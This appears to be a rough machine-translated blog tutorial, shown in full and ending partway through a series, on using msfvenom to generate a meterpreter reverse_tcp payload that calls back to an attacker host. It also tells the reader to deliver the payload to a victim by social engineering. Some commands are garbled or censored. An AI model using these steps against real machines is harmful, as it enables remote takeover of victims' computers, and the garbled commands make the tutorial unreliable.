The network security engineer demonstrates: It turns out that *** controls your server like this! (on)

Statement before class:
1. This sharing is only for learning exchanges, please consciously abide by laws and regulations!
2. Search: Kali and programming, learn more online*** dry goods!
3. Kali and programming are updated on time every day, please learn and pay attention!
Text part
1. Background introduction
Metasploit is a vulnerability framework. Its full name is The Metasploit Framework, or MSF for short. As the most popular tool in the world, Metasploit is not only because of its convenience and power, but more importantly because of its framework. It allows users to develop their own vulnerability scripts for testing. How powerful is Metasploit (msf)? How to use VPN to control the victim host? Let us study together next!
2. Resource equipment
1. One installed Linux virtual machine
2. One Xiaobai ready to go.
3. One installed Kali Linux virtual machine.
3. Strategic arrangement
3.1 Set the network mode of the victim host (Windows7) and the hacker host (Kali Linux) to NAT mode, as shown in the figure below.
Steps: Open the settings of the virtual machine/select the network adapter/select the NAT mode.
Insert picture description here

3.2 Check the IP addresses of the two hosts in the experiment, as shown in the figure below.
Command: ifconfig
Insert picture description here
Insert picture description here

3.3 Use commands to check whether the host and the victim can communicate with each other, as shown in the figure below.
Command: ping IP
Example: ping 192.168.78.162
Insert picture description here
Insert picture description here

3.4 Use the "msfvenom" *** generation tool to generate the corresponding *** file, as shown in the figure below.
Step 1: Introduction to the parameters of msfvenom tool
-p, –payload <payload> Specify the payload (*** payload) to be used. You can also use a custom payload, which supports almost all platforms
-o, -out <path> Specify the storage location of the created payload.
-h, -help View help options.
Step 2: Use the msfvenom tool to generate the corresponding *** file, as shown in the figure below.
Command: msfvenom -p specify the payload (*** load) to be used lhost=host host IP -f exe> the save location of the generated *** file
Example: msfVenom -p linux/meterpreter/reverse_tcp lhost=192.168. 78.l69 -f elf> /root/hk.elf
Insert picture description here

Step 3: Look for the corresponding *** file in the directory of the known *** file save path to see if the corresponding *** file has been generated, as shown in the figure below, the *** file already exists (here, use the graphical file management system to view, you also You can use the ls command to check whether the corresponding *** file has been generated under the corresponding path).
Insert picture description here

3.5 Use a certain social engineering method to send the generated *** file to the target victim host, and run it on the victim host (the corresponding social engineering knowledge, please continue to pay attention to this number, follow-up explanation)

Insert picture description here

3.6 Check whether the corresponding *** file already exists on the victim host, as shown in the figure below.
Command: ls
Insert picture description here

3.7 Check whether the postgresql database service is enabled, as shown in the figure below.
Command: service postgresql status
Insert picture description here

3.8 Start the postgresql database service, as shown in the figure below.
Command: service postgresql start
Insert picture description here
Insert picture description here

3.9 Initialize the postgresql database, as shown in the figure below.
Command: The editor of msfdb init typed
Insert picture description here
each word one by one, but it was hard work. Can you please pay attention to me? You can also search for: Kali and programming to learn more *** skills! No piracy, please declare the source: Kali and programming
point I learn more Kali Linux*** testing and network*** practical skills!

Guess you like

Origin blog.51cto.com/14308022/2547558
Recommended